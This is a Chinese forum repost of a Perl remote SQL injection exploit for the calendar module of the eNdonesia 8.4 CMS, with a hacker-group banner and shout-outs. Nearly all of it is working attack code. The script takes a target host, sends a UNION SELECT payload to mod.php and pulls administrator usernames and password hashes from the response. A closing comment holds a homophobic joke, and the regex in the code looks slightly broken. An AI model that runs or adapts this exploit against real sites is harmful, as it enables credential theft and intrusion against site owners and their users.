• 设为首页
  • 收藏本站
  • 积分充值
  • VIP赞助
  • 手机版
  • 微博
  • 微信
    微信公众号 添加方式:
    1:搜索微信号(888888
    2:扫描左侧二维码
  • 快捷导航
    福建二哥 门户 查看主题

    eNdonesia 8.4 (Calendar Module) Remote SQL Injection Exploit

    发布者: 您的网友已离线 | 发布时间: 2025-6-28 22:52| 查看数: 121| 评论数: 0|帖子模式

    #!/usr/bin/perl
    #/-----------------------------------------------\
    #|  /-----------------------------------------\  |
    #|  |  Remote SQL Exploit                     |  |
    #|  |  eNdonesia 8.4 Remote SQL Exploit       |  |
    #|  |  www.endonesia.org                      |  |
    #|  |  Calendar Module                        |  |
    #|  \-----------------------------------------/  |
    #|  /-----------------------------------------\  |
    #|  |  Presented By Jack                      |  |
    #|  |  MainHack Enterprise                    |  |
    #|  |  www.MainHack.com & irc.nob0dy.net      |  |
    #|  |  #MainHack #nob0dy #BaliemHackerlink    |  |
    #|  |  Jack[at]MainHack[dot]com               |  |
    #|  \-----------------------------------------/  |
    #|  /-----------------------------------------\  |
    #|  |  Hello To: Indonesian h4x0r             |  |
    #|  |  yadoy666,n0c0py & okedeh               |  |
    #|  |  VOP Crew [Vaksin13,OoN_BoY,Paman]      |  |
    #|  |  NoGe,str0ke,H312Y,s3t4n,[S]hiro,frull  |  |
    #|  |  all MainHack BrotherHood               |  |
    #|  \-----------------------------------------/  |
    #\-----------------------------------------------/

      use HTTP::Request;
      use LWP::UserAgent;

      $sql_vulnerable = "/mod.php?mod=calendar&op=list_events&loc_id=";
      $sql_injection  = "-999/**/union select/**/0x3a,0x3a,concat(aid,0x3a,pwd),0x3a,concat(name,0x3a,pwd)/**/from/**/authors/*where name pwd";

      if(!@ARGV) { &help;exit(1);}

      sub help(){
           print "\n [?] eNdonesia 8.4 Remote SQL Exploit\n";
           print " [?] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";
           print " [?] Use : perl $0 www.target.com\n";
           print " [?] Dont use \"http://\"\n";                                                                                    
           print " [?] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";
           print " [?] Baliem Hacker - VOP crew - MainHack BrotherHood \n\n";
           print " [?] www.MainHack.com\n\n";
      }

      while (){
          my $target    = $ARGV[0];
           my $exploit   = "http://".$target.$sql_vulnerable.$sql_injection;
           print "\n [-] Trying to inject $target ...\n\n";
           my $request   = HTTP::Request->new(GET=>$exploit);
           my $useragent = LWP::UserAgent->new();
           $useragent->timeout(10);
           my $response   = $useragent->request($request);
           if ($response->is_success){
                   my $res = $response->content;
                   if ($res =~ m/\>([0-9,a-z]{2,13})[0-9,a-f]{32})/g) {
                           my ($username,$passwd) = ($1,$2);
                           print " [target] $target \n";
                           print " [loginx] $usernamepasswd \n\n";
                           exit(0);
                   }
                   else {
                           die " [error] Fail to get username and password.\n\n";
                   }
           }
           else {
                   die " [error] Fail to inject $target \n\n";
           }
      }

    #/----------------------------------------------------------------\
    #|  NoGay kalo kita artikan sepintas berarti Tidak ada Gay        |
    #|  namun mari kita perhatikan secara seksama ...                 |
    #|  NoGay merupakan kependekan dari NoGe is Gay.                  |
    #|  Sungguh, penyembunyian sebuah karakter di balik makna kata.   |
    #\----------------------------------------------------------------/
    #Vendor Has been contacted and now working for it.


    来源:https://www.jb51.net/hack/5735.html
    免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

    最新评论

    QQ Archiver 手机版 小黑屋 福建二哥 ( 闽ICP备2022004717号|闽公网安备35052402000345号 )

    Powered by Discuz! X3.5 © 2001-2023

    快速回复 返回顶部 返回列表